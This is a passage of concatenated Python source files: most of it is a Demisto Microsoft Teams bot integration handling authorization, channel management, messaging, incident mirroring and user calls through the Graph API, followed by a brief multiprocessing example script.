keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
demisto.setIntegrationContext(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = demisto.getIntegrationContext()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_users() -> list:
"""
Retrieves list of AAD users
:return: List of AAD users
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
users: dict = cast(Dict[Any, Any], http_request('GET', url))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
Add a user to a channel (private channels only, as this API is still in beta)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
users: list = get_users()
user_id: str = str()
found_member: bool = False
for user in users:
if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
found_member = True
user_id = user.get('id', '')
break
if not found_member:
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user_id)
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = demisto.getIntegrationContext()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
Input: 'good morning @Demisto'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
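# Taken together with process_mentioned_users_in_message, the mention flow used
# by send_message below looks roughly like this (message text is illustrative):
#
#     users, text = process_mentioned_users_in_message('thanks @Demisto; !')
#     entities = mentioned_users_to_entities(users, demisto.getIntegrationContext())
#     conversation = {'type': 'message', 'text': text, 'entities': entities}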
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
raise ValueError('Provide either message or adaptive card to send, not both.')
integration_context: dict = demisto.getIntegrationContext()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = demisto.getIntegrationContext()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
try:
integration_context = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
# Didn't find an existing team, adding a new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param value: Object which includes the user response, entitlement, investigation ID and task ID
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
                            user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = demisto.getIntegrationContext()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
demisto.setIntegrationContext(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
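# Illustrative sketch only: a minimal activity payload of the kind the route above processes,
# assembled from the fields it reads (serviceUrl, channelData, conversation, from, text).
# All values are hypothetical; real Bot Framework activities contain many more fields.
_EXAMPLE_ACTIVITY = {
    'serviceUrl': 'https://smba.trafficmanager.net/emea/',                # hypothetical service URL
    'channelData': {},                                                    # empty for a personal chat
    'conversation': {'conversationType': 'personal', 'id': 'a:1example'},
    'from': {'id': '29:example-member-id', 'name': 'Example User'},
    'text': 'list incidents',                                             # hypothetical direct-message command
}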
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
        This is a ring only; no media is played if the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = demisto.getIntegrationContext()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
users: list = get_users()
user_id: str = str()
for user in users:
if username_to_call in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
user_id = user.get('id', '')
break
if not user_id:
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user_id
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('', port), APP, **ssl_args)
server.serve_forever()
except Exception as e:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
if command == 'long-running-execution':
LOG(str(e))
LOG.print_log()
demisto.updateModuleHealth(str(e))
else:
return_error(str(e))
if __name__ == 'builtins':
main()
|
multi1.py
|
"""
multiprocess basics: Process works like threading.Thread, but
runs function call in parallel in a process instead of a thread;
locks can be used to synchronize, e.g. prints on some platforms;
starts new interpreter on windows, forks a new process on unix;
"""
import os
from multiprocessing import Process, Lock
def whoami(label, lock):
msg = '%s: name:%s, pid:%s'
with lock:
print(msg % (label, __name__, os.getpid()))
if __name__ == '__main__':
lock = Lock()
whoami('function call', lock)
p = Process(target=whoami, args=('spawned child', lock))
p.start()
p.join()
for i in range(5):
Process(target=whoami, args=(('run process %s' % i), lock)).start()
with lock:
print('Main process exit.')
|
ConnectionManager.py
|
